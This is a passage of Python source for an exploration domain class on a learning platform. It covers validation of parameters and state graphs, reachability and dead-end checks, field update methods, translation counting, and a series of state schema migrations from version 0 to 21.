if not re.match(feconf.ALPHANUMERIC_REGEX, param_name):
raise utils.ValidationError(
'Only parameter names with characters in [a-zA-Z0-9] are '
'accepted.')
self.param_specs[param_name].validate()
if not isinstance(self.param_changes, list):
raise utils.ValidationError(
'Expected param_changes to be a list, received %s'
% self.param_changes)
for param_change in self.param_changes:
param_change.validate()
if param_change.name in constants.INVALID_PARAMETER_NAMES:
raise utils.ValidationError(
'The exploration-level parameter with name \'%s\' is '
'reserved. Please choose a different name.'
% param_change.name)
if param_change.name not in self.param_specs:
raise utils.ValidationError(
'No parameter named \'%s\' exists in this exploration'
% param_change.name)
# TODO(sll): Find a way to verify the param change customization args
# when they depend on exploration/state parameters (e.g. the generated
# values must have the correct obj_type). Can we get sample values for
# the reader's answer and these parameters by looking at states that
# link to this one?
# Check that all state param changes are valid.
for state_name, state in self.states.items():
for param_change in state.param_changes:
param_change.validate()
if param_change.name in constants.INVALID_PARAMETER_NAMES:
raise utils.ValidationError(
'The parameter name \'%s\' is reserved. Please choose '
'a different name for the parameter being set in '
'state \'%s\'.' % (param_change.name, state_name))
if param_change.name not in self.param_specs:
raise utils.ValidationError(
'The parameter with name \'%s\' was set in state '
'\'%s\', but it does not exist in the list of '
'parameter specifications for this exploration.'
% (param_change.name, state_name))
# Check that all answer groups, outcomes, and param_changes are valid.
all_state_names = list(self.states.keys())
for state_name, state in self.states.items():
interaction = state.interaction
default_outcome = interaction.default_outcome
if default_outcome is not None:
# Check the default destination, if any.
if default_outcome.dest not in all_state_names:
raise utils.ValidationError(
'The destination %s is not a valid state.'
% default_outcome.dest)
# Check that, if the outcome is a non-self-loop, then the
# refresher_exploration_id is None.
if (default_outcome.refresher_exploration_id is not None and
default_outcome.dest != state_name):
raise utils.ValidationError(
'The default outcome for state %s has a refresher '
'exploration ID, but is not a self-loop.' % state_name)
for group in interaction.answer_groups:
# Check group destinations.
if group.outcome.dest not in all_state_names:
raise utils.ValidationError(
'The destination %s is not a valid state.'
% group.outcome.dest)
# Check that, if the outcome is a non-self-loop, then the
# refresher_exploration_id is None.
if (group.outcome.refresher_exploration_id is not None and
group.outcome.dest != state_name):
raise utils.ValidationError(
'The outcome for an answer group in state %s has a '
'refresher exploration ID, but is not a self-loop.'
% state_name)
for param_change in group.outcome.param_changes:
if param_change.name not in self.param_specs:
raise utils.ValidationError(
'The parameter %s was used in an answer group, '
'but it does not exist in this exploration'
% param_change.name)
if strict:
warnings_list = []
try:
self._verify_all_states_reachable()
except utils.ValidationError as e:
warnings_list.append(python_utils.UNICODE(e))
try:
self._verify_no_dead_ends()
except utils.ValidationError as e:
warnings_list.append(python_utils.UNICODE(e))
if not self.title:
warnings_list.append(
'A title must be specified (in the \'Settings\' tab).')
if not self.category:
warnings_list.append(
'A category must be specified (in the \'Settings\' tab).')
if not self.objective:
warnings_list.append(
'An objective must be specified (in the \'Settings\' tab).'
)
# Check that self-loop outcomes are not labelled as correct.
all_state_names = list(self.states.keys())
for state_name, state in self.states.items():
interaction = state.interaction
default_outcome = interaction.default_outcome
if default_outcome is not None:
# Check that, if the outcome is a self-loop, then the
# outcome is not labelled as correct.
if (default_outcome.dest == state_name and
default_outcome.labelled_as_correct):
raise utils.ValidationError(
'The default outcome for state %s is labelled '
'correct but is a self-loop.' % state_name)
for group in interaction.answer_groups:
# Check that, if the outcome is a self-loop, then the
# outcome is not labelled as correct.
if (group.outcome.dest == state_name and
group.outcome.labelled_as_correct):
raise utils.ValidationError(
'The outcome for an answer group in state %s is '
'labelled correct but is a self-loop.' % state_name)
if len(warnings_list) > 0:
warning_str = ''
for ind, warning in enumerate(warnings_list):
warning_str += '%s. %s ' % (ind + 1, warning)
raise utils.ValidationError(
'Please fix the following issues before saving this '
'exploration: %s' % warning_str)
def _verify_all_states_reachable(self):
"""Verifies that all states are reachable from the initial state.
Raises:
ValidationError: One or more states are not reachable from the
initial state of the Exploration.
"""
# This queue stores state names.
processed_queue = []
curr_queue = [self.init_state_name]
while curr_queue:
curr_state_name = curr_queue[0]
curr_queue = curr_queue[1:]
if not curr_state_name in processed_queue:
processed_queue.append(curr_state_name)
curr_state = self.states[curr_state_name]
if not curr_state.interaction.is_terminal:
all_outcomes = curr_state.interaction.get_all_outcomes()
for outcome in all_outcomes:
dest_state = outcome.dest
if (dest_state not in curr_queue and
dest_state not in processed_queue):
curr_queue.append(dest_state)
if len(self.states) != len(processed_queue):
unseen_states = list(
set(self.states.keys()) - set(processed_queue))
raise utils.ValidationError(
'The following states are not reachable from the initial '
'state: %s' % ', '.join(unseen_states))
def _verify_no_dead_ends(self):
"""Verifies that all states can reach a terminal state.
Raises:
ValidationError: If is impossible to complete the exploration from
a state.
"""
# This queue stores state names.
processed_queue = []
curr_queue = []
for (state_name, state) in self.states.items():
if state.interaction.is_terminal:
curr_queue.append(state_name)
while curr_queue:
curr_state_name = curr_queue[0]
curr_queue = curr_queue[1:]
if not curr_state_name in processed_queue:
processed_queue.append(curr_state_name)
for (state_name, state) in self.states.items():
if (state_name not in curr_queue
and state_name not in processed_queue):
all_outcomes = (
state.interaction.get_all_outcomes())
for outcome in all_outcomes:
if outcome.dest == curr_state_name:
curr_queue.append(state_name)
break
if len(self.states) != len(processed_queue):
dead_end_states = list(
set(self.states.keys()) - set(processed_queue))
raise utils.ValidationError(
'It is impossible to complete the exploration from the '
'following states: %s' % ', '.join(dead_end_states))
def get_content_html(self, state_name, content_id):
"""Return the content for a given content id of a state.
Args:
state_name: str. The name of the state.
content_id: str. The id of the content.
Returns:
str. The html content corresponding to the given content id of a
state.
Raises:
ValueError: The given state_name does not exist.
"""
if state_name not in self.states:
raise ValueError('State %s does not exist' % state_name)
return self.states[state_name].get_content_html(content_id)
# Derived attributes of an exploration.
@property
def init_state(self):
"""The state which forms the start of this exploration.
Returns:
State. The corresponding State domain object.
"""
return self.states[self.init_state_name]
@property
def param_specs_dict(self):
"""A dict of param specs, each represented as Python dicts.
Returns:
dict. Dict of parameter specs.
"""
return {ps_name: ps_val.to_dict()
for (ps_name, ps_val) in self.param_specs.items()}
@property
def param_change_dicts(self):
"""A list of param changes, represented as JSONifiable Python dicts.
Returns:
list(dict). List of dicts, each representing a parameter change.
"""
return [param_change.to_dict() for param_change in self.param_changes]
@classmethod
def is_demo_exploration_id(cls, exploration_id):
"""Whether the given exploration id is a demo exploration.
Args:
exploration_id: str. The exploration id.
Returns:
bool. Whether the corresponding exploration is a demo exploration.
"""
return exploration_id in feconf.DEMO_EXPLORATIONS
@property
def is_demo(self):
"""Whether the exploration is one of the demo explorations.
Returns:
bool. True is the current exploration is a demo exploration.
"""
return self.is_demo_exploration_id(self.id)
def has_state_name(self, state_name):
"""Whether the exploration has a state with the given state name.
Args:
state_name: str. The name of the state.
Returns:
bool. Returns true if the exploration has the given state name.
"""
state_names = list(self.states.keys())
return state_name in state_names
def get_interaction_id_by_state_name(self, state_name):
"""Returns the interaction id of the state.
Args:
state_name: str. The name of the state.
Returns:
str or None. The ID of the interaction.
"""
return self.states[state_name].interaction.id
def update_title(self, title):
"""Update the exploration title.
Args:
title: str. The exploration title to set.
"""
self.title = title
def update_category(self, category):
"""Update the exploration category.
Args:
category: str. The exploration category to set.
"""
self.category = category
def update_objective(self, objective):
"""Update the exploration objective.
Args:
objective: str. The exploration objective to set.
"""
self.objective = objective
def update_language_code(self, language_code):
"""Update the exploration language code.
Args:
language_code: str. The exploration language code to set.
"""
self.language_code = language_code
def update_tags(self, tags):
"""Update the tags of the exploration.
Args:
tags: list(str). List of tags to set.
"""
self.tags = tags
def update_blurb(self, blurb):
"""Update the blurb of the exploration.
Args:
blurb: str. The blurb to set.
"""
self.blurb = blurb
def update_author_notes(self, author_notes):
"""Update the author notes of the exploration.
Args:
author_notes: str. The author notes to set.
"""
self.author_notes = author_notes
def update_param_specs(self, param_specs_dict):
"""Update the param spec dict.
Args:
param_specs_dict: dict. A dict where each key-value pair represents
respectively, a param spec name and a dict used to initialize a
ParamSpec domain object.
"""
self.param_specs = {
ps_name: param_domain.ParamSpec.from_dict(ps_val)
for (ps_name, ps_val) in param_specs_dict.items()
}
def update_param_changes(self, param_changes):
"""Update the param change dict.
Args:
param_changes: list(ParamChange). List of ParamChange objects.
"""
self.param_changes = param_changes
def update_init_state_name(self, init_state_name):
"""Update the name for the initial state of the exploration.
Args:
init_state_name: str. The new name of the initial state.
"""
if init_state_name not in self.states:
raise Exception(
'Invalid new initial state name: %s; '
'it is not in the list of states %s for this '
'exploration.' % (init_state_name, list(self.states.keys())))
self.init_state_name = init_state_name
def update_auto_tts_enabled(self, auto_tts_enabled):
"""Update whether automatic text-to-speech is enabled.
Args:
auto_tts_enabled: bool. Whether automatic text-to-speech
is enabled or not.
"""
self.auto_tts_enabled = auto_tts_enabled
def update_correctness_feedback_enabled(self, correctness_feedback_enabled):
"""Update whether correctness feedback is enabled.
Args:
correctness_feedback_enabled: bool. Whether correctness feedback
is enabled or not.
"""
self.correctness_feedback_enabled = correctness_feedback_enabled
# Methods relating to states.
def add_states(self, state_names):
"""Adds multiple states to the exploration.
Args:
state_names: list(str). List of state names to add.
Raises:
ValueError: At least one of the new state names already exists in
the states dict.
"""
for state_name in state_names:
if state_name in self.states:
raise ValueError('Duplicate state name %s' % state_name)
for state_name in state_names:
self.states[state_name] = state_domain.State.create_default_state(
state_name)
def rename_state(self, old_state_name, new_state_name):
"""Renames the given state.
Args:
old_state_name: str. The old name of state to rename.
new_state_name: str. The new state name.
Raises:
ValueError: The old state name does not exist or the new state name
is already in states dict.
"""
if old_state_name not in self.states:
raise ValueError('State %s does not exist' % old_state_name)
if (old_state_name != new_state_name and
new_state_name in self.states):
raise ValueError('Duplicate state name: %s' % new_state_name)
if old_state_name == new_state_name:
return
self._validate_state_name(new_state_name)
self.states[new_state_name] = copy.deepcopy(
self.states[old_state_name])
del self.states[old_state_name]
if self.init_state_name == old_state_name:
self.update_init_state_name(new_state_name)
# Find all destinations in the exploration which equal the renamed
# state, and change the name appropriately.
for other_state_name in self.states:
other_state = self.states[other_state_name]
other_outcomes = other_state.interaction.get_all_outcomes()
for outcome in other_outcomes:
if outcome.dest == old_state_name:
outcome.dest = new_state_name
def delete_state(self, state_name):
"""Deletes the given state.
Args:
state_name: str. The state name to be deleted.
Raises:
ValueError: The state does not exist or is the initial state of the
exploration.
"""
if state_name not in self.states:
raise ValueError('State %s does not exist' % state_name)
# Do not allow deletion of initial states.
if self.init_state_name == state_name:
raise ValueError('Cannot delete initial state of an exploration.')
# Find all destinations in the exploration which equal the deleted
# state, and change them to loop back to their containing state.
for other_state_name in self.states:
other_state = self.states[other_state_name]
all_outcomes = other_state.interaction.get_all_outcomes()
for outcome in all_outcomes:
if outcome.dest == state_name:
outcome.dest = other_state_name
del self.states[state_name]
def get_translatable_text(self, language_code):
"""Returns all the contents which needs translation in the given
language.
Args:
language_code: str. The language code in which translation is
required.
Returns:
dict(str, dict(str, str)). A dict where state_name is the key and a
dict with content_id as the key and html content as value.
"""
state_names_to_content_id_mapping = {}
for state_name, state in self.states.items():
state_names_to_content_id_mapping[state_name] = (
state.get_content_id_mapping_needing_translations(
language_code))
return state_names_to_content_id_mapping
def get_trainable_states_dict(self, old_states, exp_versions_diff):
"""Retrieves the state names of all trainable states in an exploration
segregated into state names with changed and unchanged answer groups.
In this method, the new_state_name refers to the name of the state in
the current version of the exploration whereas the old_state_name refers
to the name of the state in the previous version of the exploration.
Args:
old_states: dict. Dictionary containing all State domain objects.
exp_versions_diff: ExplorationVersionsDiff. An instance of the
exploration versions diff class.
Returns:
dict. The trainable states dict. This dict has three keys
representing state names with changed answer groups and
unchanged answer groups respectively.
"""
trainable_states_dict = {
'state_names_with_changed_answer_groups': [],
'state_names_with_unchanged_answer_groups': []
}
new_states = self.states
for new_state_name in new_states:
new_state = new_states[new_state_name]
if not new_state.can_undergo_classification():
continue
old_state_name = new_state_name
if new_state_name in exp_versions_diff.new_to_old_state_names:
old_state_name = exp_versions_diff.new_to_old_state_names[
new_state_name]
# The case where a new state is added. When this happens, the
# old_state_name will be equal to the new_state_name and it will not
# be present in the exploration's older version.
if old_state_name not in old_states:
trainable_states_dict[
'state_names_with_changed_answer_groups'].append(
new_state_name)
continue
old_state = old_states[old_state_name]
old_training_data = old_state.get_training_data()
new_training_data = new_state.get_training_data()
# Check if the training data and interaction_id of the state in the
# previous version of the exploration and the state in the new
# version of the exploration match. If any of them are not equal,
# we create a new job for the state in the current version.
if new_training_data == old_training_data and (
new_state.interaction.id == old_state.interaction.id):
trainable_states_dict[
'state_names_with_unchanged_answer_groups'].append(
new_state_name)
else:
trainable_states_dict[
'state_names_with_changed_answer_groups'].append(
new_state_name)
return trainable_states_dict
def get_languages_with_complete_translation(self):
"""Returns a list of language code in which the exploration translation
is 100%.
Return:
list(str). A list of language code in which the translation for the
exploration is complete i.e, 100%.
"""
content_count = self.get_content_count()
language_code_list = []
for language_code, count in self.get_translation_counts().items():
if count == content_count:
language_code_list.append(language_code)
return language_code_list
def get_translation_counts(self):
"""Returns a dict representing the number of translations available in a
language for which there exists at least one translation in the
exploration.
Returns:
dict(str, int). A dict with language code as a key and number of
translation available in that language as the value.
"""
exploration_translation_counts = collections.defaultdict(int)
for state in self.states.values():
state_translation_counts = state.get_translation_counts()
for language, count in state_translation_counts.items():
exploration_translation_counts[language] += count
return dict(exploration_translation_counts)
def get_content_count(self):
"""Returns the total number of distinct content fields available in the
exploration which are user facing and can be translated into
different languages.
(The content field includes state content, feedback, hints, solutions.)
Return:
int. The total number of distinct content fields available inside
the exploration.
"""
content_count = 0
for state in self.states.values():
content_count += state.get_content_count()
return content_count
@classmethod
def _convert_states_v0_dict_to_v1_dict(cls, states_dict):
"""Converts old states schema to the modern v1 schema. v1 contains the
schema version 1 and does not contain any old constructs, such as
widgets. This is a complete migration of everything previous to the
schema versioning update to the earliest versioned schema.
Note that the states_dict being passed in is modified in-place.
Args:
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
Returns:
dict. The converted states_dict.
"""
# Ensure widgets are renamed to be interactions.
for _, state_defn in states_dict.items():
if 'widget' not in state_defn:
continue
state_defn['interaction'] = copy.deepcopy(state_defn['widget'])
state_defn['interaction']['id'] = copy.deepcopy(
state_defn['interaction']['widget_id'])
del state_defn['interaction']['widget_id']
if 'sticky' in state_defn['interaction']:
del state_defn['interaction']['sticky']
del state_defn['widget']
return states_dict
@classmethod
def _convert_states_v1_dict_to_v2_dict(cls, states_dict):
"""Converts from version 1 to 2. Version 1 assumes the existence of an
implicit 'END' state, but version 2 does not. As a result, the
conversion process involves introducing a proper ending state for all
explorations previously designed under this assumption.
Note that the states_dict being passed in is modified in-place.
Args:
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
Returns:
dict. The converted states_dict.
"""
# The name of the implicit END state before the migration. Needed here
# to migrate old explorations which expect that implicit END state.
old_end_dest = 'END'
# Adds an explicit state called 'END' with an EndExploration to replace
# links other states have to an implicit 'END' state. Otherwise, if no
# states refer to a state called 'END', no new state will be introduced
# since it would be isolated from all other states in the graph and
# create additional warnings for the user. If they were not referring
# to an 'END' state before, then they would only be receiving warnings
# about not being able to complete the exploration. The introduction of
# a real END state would produce additional warnings (state cannot be
# reached from other states, etc.).
targets_end_state = False
has_end_state = False
for (state_name, sdict) in states_dict.items():
if not has_end_state and state_name == old_end_dest:
has_end_state = True
if not targets_end_state:
for handler in sdict['interaction']['handlers']:
for rule_spec in handler['rule_specs']:
if rule_spec['dest'] == old_end_dest:
targets_end_state = True
break
# Ensure any explorations pointing to an END state has a valid END
# state to end with (in case it expects an END state).
if targets_end_state and not has_end_state:
states_dict[old_end_dest] = {
'content': [{
'type': 'text',
'value': 'Congratulations, you have finished!'
}],
'interaction': {
'id': 'EndExploration',
'customization_args': {
'recommendedExplorationIds': {
'value': []
}
},
'handlers': [{
'name': 'submit',
'rule_specs': [{
'definition': {
'rule_type': 'default'
},
'dest': old_end_dest,
'feedback': [],
'param_changes': []
}]
}],
},
'param_changes': []
}
return states_dict
@classmethod
def _convert_states_v2_dict_to_v3_dict(cls, states_dict):
"""Converts from version 2 to 3. Version 3 introduces a triggers list
within interactions.
Note that the states_dict being passed in is modified in-place.
Args:
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
Returns:
dict. The converted states_dict.
"""
# Ensure all states interactions have a triggers list.
for sdict in states_dict.values():
interaction = sdict['interaction']
if 'triggers' not in interaction:
interaction['triggers'] = []
return states_dict
@classmethod
def _convert_states_v3_dict_to_v4_dict(cls, states_dict):
"""Converts from version 3 to 4. Version 4 introduces a new structure
for rules by organizing them into answer groups instead of handlers.
This migration involves a 1:1 mapping from rule specs to answer groups
containing just that single rule. Default rules have their destination
state name and feedback copied to the default_outcome portion of an
interaction instance.
Note that the states_dict being passed in is modified in-place.
Args:
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
Returns:
dict. The converted states_dict.
"""
for state_dict in states_dict.values():
interaction = state_dict['interaction']
answer_groups = []
default_outcome = None
for handler in interaction['handlers']:
# Ensure the name is 'submit'.
if 'name' in handler and handler['name'] != 'submit':
raise utils.ExplorationConversionError(
'Error: Can only convert rules with a name '
'\'submit\' in states v3 to v4 conversion process. '
'Encountered name: %s' % handler['name'])
# Each rule spec becomes a new answer group.
for rule_spec in handler['rule_specs']:
group = {}
# Rules don't have a rule_type key anymore.
is_default_rule = False
if 'rule_type' in rule_spec['definition']:
rule_type = rule_spec['definition']['rule_type']
is_default_rule = (rule_type == 'default')
# Ensure the rule type is either default or atomic.
if not is_default_rule and rule_type != 'atomic':
raise utils.ExplorationConversionError(
'Error: Can only convert default and atomic '
'rules in states v3 to v4 conversion process. '
'Encountered rule of type: %s' % rule_type)
# Ensure the subject is answer.
if ('subject' in rule_spec['definition'] and
rule_spec['definition']['subject'] != 'answer'):
raise utils.ExplorationConversionError(
'Error: Can only convert rules with an \'answer\' '
'subject in states v3 to v4 conversion process. '
'Encountered subject: %s'
% rule_spec['definition']['subject'])
# The rule turns into the group's only rule. Rules do not
# have definitions anymore. Do not copy the inputs and name
# if it is a default rule.
if not is_default_rule:
definition = rule_spec['definition']
group['rule_specs'] = [{
'inputs': copy.deepcopy(definition['inputs']),
'rule_type': copy.deepcopy(definition['name'])
}]
# Answer groups now have an outcome.
group['outcome'] = {
'dest': copy.deepcopy(rule_spec['dest']),
'feedback': copy.deepcopy(rule_spec['feedback']),
'param_changes': (
copy.deepcopy(rule_spec['param_changes'])
if 'param_changes' in rule_spec else [])
}
if is_default_rule:
default_outcome = group['outcome']
else:
answer_groups.append(group)
try:
is_terminal = (
interaction_registry.Registry.get_interaction_by_id(
interaction['id']
).is_terminal if interaction['id'] is not None else False)
except KeyError:
raise utils.ExplorationConversionError(
'Trying to migrate exploration containing non-existent '
'interaction ID: %s' % interaction['id'])
if not is_terminal:
interaction['answer_groups'] = answer_groups
interaction['default_outcome'] = default_outcome
else:
# Terminal nodes have no answer groups or outcomes.
interaction['answer_groups'] = []
interaction['default_outcome'] = None
del interaction['handlers']
return states_dict
@classmethod
def _convert_states_v4_dict_to_v5_dict(cls, states_dict):
"""Converts from version 4 to 5. Version 5 removes the triggers list
within interactions, and replaces it with a fallbacks list.
Note that the states_dict being passed in is modified in-place.
Args:
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
Returns:
dict. The converted states_dict.
"""
# Ensure all states interactions have a fallbacks list.
for state_dict in states_dict.values():
interaction = state_dict['interaction']
if 'triggers' in interaction:
del interaction['triggers']
if 'fallbacks' not in interaction:
interaction['fallbacks'] = []
return states_dict
@classmethod
def _convert_states_v5_dict_to_v6_dict(cls, states_dict):
"""Converts from version 5 to 6. Version 6 introduces a list of
confirmed unclassified answers. Those are answers which are confirmed
to be associated with the default outcome during classification.
Args:
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
Returns:
dict. The converted states_dict.
"""
for state_dict in states_dict.values():
interaction = state_dict['interaction']
if 'confirmed_unclassified_answers' not in interaction:
interaction['confirmed_unclassified_answers'] = []
return states_dict
@classmethod
def _convert_states_v6_dict_to_v7_dict(cls, states_dict):
"""Converts from version 6 to 7. Version 7 forces all CodeRepl
interactions to use Python.
Args:
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
Returns:
dict. The converted states_dict.
"""
for state_dict in states_dict.values():
interaction = state_dict['interaction']
if interaction['id'] == 'CodeRepl':
interaction['customization_args']['language']['value'] = (
'python')
return states_dict
# TODO(bhenning): Remove pre_v4_states_conversion_func when the answer
# migration is completed.
@classmethod
def _convert_states_v7_dict_to_v8_dict(cls, states_dict):
"""Converts from version 7 to 8. Version 8 contains classifier
model id.
Args:
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
Returns:
dict. The converted states_dict.
"""
for state_dict in states_dict.values():
state_dict['classifier_model_id'] = None
return states_dict
@classmethod
def _convert_states_v8_dict_to_v9_dict(cls, states_dict):
"""Converts from version 8 to 9. Version 9 contains 'correct'
field in answer groups.
Args:
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
Returns:
dict. The converted states_dict.
"""
for state_dict in states_dict.values():
answer_groups = state_dict['interaction']['answer_groups']
for answer_group in answer_groups:
answer_group['correct'] = False
return states_dict
@classmethod
def _convert_states_v9_dict_to_v10_dict(cls, states_dict):
"""Converts from version 9 to 10. Version 10 contains hints
and solution in each interaction.
Args:
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
Returns:
dict. The converted states_dict.
"""
for state_dict in states_dict.values():
interaction = state_dict['interaction']
if 'hints' not in interaction:
interaction['hints'] = []
for fallback in interaction['fallbacks']:
if fallback['outcome']['feedback']:
interaction['hints'].append({
'hint_text': fallback['outcome']['feedback'][0]
})
if 'solution' not in interaction:
interaction['solution'] = None
return states_dict
@classmethod
def _convert_states_v10_dict_to_v11_dict(cls, states_dict):
"""Converts from version 10 to 11. Version 11 refactors the content to
be an HTML string with audio translations.
Args:
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
Returns:
dict. The converted states_dict.
"""
for state_dict in states_dict.values():
content_html = state_dict['content'][0]['value']
state_dict['content'] = {
'html': content_html,
'audio_translations': []
}
return states_dict
@classmethod
def _convert_states_v11_dict_to_v12_dict(cls, states_dict):
"""Converts from version 11 to 12. Version 12 refactors audio
translations from a list to a dict keyed by language code.
Args:
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
Returns:
dict. The converted states_dict.
"""
for state_dict in states_dict.values():
old_audio_translations = state_dict['content']['audio_translations']
state_dict['content']['audio_translations'] = {
old_translation['language_code']: {
'filename': old_translation['filename'],
'file_size_bytes': old_translation['file_size_bytes'],
'needs_update': old_translation['needs_update'],
}
for old_translation in old_audio_translations
}
return states_dict
@classmethod
def _convert_states_v12_dict_to_v13_dict(cls, states_dict):
"""Converts from version 12 to 13. Version 13 sets empty
solutions to None and removes fallbacks.
Args:
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
Returns:
dict. The converted states_dict.
"""
for state_dict in states_dict.values():
if 'fallbacks' in state_dict['interaction']:
del state_dict['interaction']['fallbacks']
if not state_dict['interaction']['solution']:
state_dict['interaction']['solution'] = None
return states_dict
@classmethod
def _convert_states_v13_dict_to_v14_dict(cls, states_dict):
"""Converts from version 13 to 14. Version 14 adds
audio translations to feedback, hints, and solutions.
Args:
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
Returns:
dict. The converted states_dict.
"""
for state_dict in states_dict.values():
if state_dict['interaction']['default_outcome'] is not None:
old_feedback_list = (
state_dict['interaction']['default_outcome']['feedback'])
default_feedback_html = (
old_feedback_list[0] if len(old_feedback_list) > 0 else '')
state_dict['interaction']['default_outcome']['feedback'] = {
'html': default_feedback_html,
'audio_translations': {}
}
for answer_group_dict in state_dict['interaction']['answer_groups']:
old_answer_group_feedback_list = (
answer_group_dict['outcome']['feedback'])
feedback_html = (
old_answer_group_feedback_list[0]
if len(old_answer_group_feedback_list) > 0 else '')
answer_group_dict['outcome']['feedback'] = {
'html': feedback_html,
'audio_translations': {}
}
for hint_dict in state_dict['interaction']['hints']:
hint_content_html = hint_dict['hint_text']
del hint_dict['hint_text']
hint_dict['hint_content'] = {
'html': hint_content_html,
'audio_translations': {}
}
if state_dict['interaction']['solution']:
explanation = (
state_dict['interaction']['solution']['explanation'])
state_dict['interaction']['solution']['explanation'] = {
'html': explanation,
'audio_translations': {}
}
return states_dict
@classmethod
def _convert_states_v14_dict_to_v15_dict(cls, states_dict):
"""Converts from version 14 to 15. Version 15 renames the "correct"
field in answer groups to "labelled_as_correct" and (for safety) resets
all "labelled_as_correct" values to False.
Args:
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
Returns:
dict. The converted states_dict.
"""
for state_dict in states_dict.values():
answer_groups = state_dict['interaction']['answer_groups']
for answer_group in answer_groups:
answer_group['labelled_as_correct'] = False
del answer_group['correct']
return states_dict
@classmethod
def _convert_states_v15_dict_to_v16_dict(cls, states_dict):
"""Converts from version 15 to 16. Version 16 adds a
refresher_exploration_id field to each outcome.
Args:
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
Returns:
dict. The converted states_dict.
"""
for state_dict in states_dict.values():
answer_groups = state_dict['interaction']['answer_groups']
for answer_group in answer_groups:
answer_group['outcome']['refresher_exploration_id'] = None
if state_dict['interaction']['default_outcome'] is not None:
default_outcome = state_dict['interaction']['default_outcome']
default_outcome['refresher_exploration_id'] = None
return states_dict
@classmethod
def _convert_states_v16_dict_to_v17_dict(cls, states_dict):
"""Converts from version 16 to 17. Version 17 moves the
labelled_as_correct field to the outcome dict (so that it also appears
for the default outcome) and adds two new customization args to
FractionInput interactions.
Args:
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
Returns:
dict. The converted states_dict.
"""
for state_dict in states_dict.values():
answer_groups = state_dict['interaction']['answer_groups']
for answer_group in answer_groups:
answer_group['outcome']['labelled_as_correct'] = (
answer_group['labelled_as_correct'])
del answer_group['labelled_as_correct']
default_outcome = state_dict['interaction']['default_outcome']
if default_outcome is not None:
default_outcome['labelled_as_correct'] = False
if state_dict['interaction']['id'] == 'FractionInput':
customization_args = state_dict[
'interaction']['customization_args']
customization_args.update({
'allowImproperFraction': {
'value': True
},
'allowNonzeroIntegerPart': {
'value': True
}
})
return states_dict
@classmethod
def _convert_states_v17_dict_to_v18_dict(cls, states_dict):
"""Converts from version 17 to 18. Version 18 adds a new
customization arg to FractionInput interactions which allows
you to add custom placeholders.
Args:
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
Returns:
dict. The converted states_dict.
"""
for state_dict in states_dict.values():
if state_dict['interaction']['id'] == 'FractionInput':
customization_args = state_dict[
'interaction']['customization_args']
customization_args.update({
'customPlaceholder': {
'value': ''
}
})
return states_dict
@classmethod
def _convert_states_v18_dict_to_v19_dict(cls, states_dict):
"""Converts from version 18 to 19. Version 19 adds training_data
parameter to each answer group to store training data of that
answer group.
Args:
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
Returns:
dict. The converted states_dict.
"""
for state_dict in states_dict.values():
answer_group_indexes_to_preserve = []
answer_groups = state_dict['interaction']['answer_groups']
for answer_group_index, answer_group in enumerate(answer_groups):
if answer_group['rule_specs']:
training_data = []
classifier_rule_index = None
rule_specs = answer_group['rule_specs']
for rule_index, rule in enumerate(rule_specs):
if rule['rule_type'] == 'FuzzyMatches':
training_data = rule['inputs']['training_data']
classifier_rule_index = rule_index
break
if classifier_rule_index is not None:
answer_group['rule_specs'].pop(classifier_rule_index)
answer_group['training_data'] = training_data
if training_data or answer_group['rule_specs']:
answer_group_indexes_to_preserve.append(
answer_group_index)
preserved_answer_groups = []
for answer_group_index in answer_group_indexes_to_preserve:
preserved_answer_groups.append(
answer_groups[answer_group_index])
state_dict['interaction']['answer_groups'] = preserved_answer_groups
return states_dict
@classmethod
def _convert_states_v19_dict_to_v20_dict(cls, states_dict):
"""Converts from version 19 to 20. Version 20 adds
tagged_misconception field to answer groups and
missing_prerequisite_skill_id field to outcomes.
Args:
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
Returns:
dict. The converted states_dict.
"""
for state_dict in states_dict.values():
answer_groups = state_dict['interaction']['answer_groups']
for answer_group in answer_groups:
answer_group['outcome']['missing_prerequisite_skill_id'] = None
answer_group['tagged_misconception_id'] = None
default_outcome = state_dict['interaction']['default_outcome']
if default_outcome is not None:
default_outcome['missing_prerequisite_skill_id'] = None
return states_dict
@classmethod
def _convert_states_v20_dict_to_v21_dict(cls, states_dict):
"""Converts from version 20 to 21. Version 21 moves audio_translations
from SubtitledHTML to content_ids_to_audio_translations.
Args:
states_dict: dict. A dict where each key-value pair represents,
respectively, a state name and a dict used to initialize a
State domain object.
Returns:
dict. The converted states_dict.
"""
for state_dict in states_dict.values():
content_ids_to_audio_translations = {}
content_id = 'content'
content_ids_to_audio_translations[content_id] = (
state_dict['content'].pop('audio_translations'))
state_dict['content']['content_id'] = content_id
for index, answer_group in enumerate(
state_dict['interaction']['answer_groups']):
content_id = 'feedback_' + python_utils.convert_to_bytes(
index + 1)
content_ids_to_audio_translations[content_id] = (
answer_group['outcome']['feedback'].pop(
'audio_translations'))
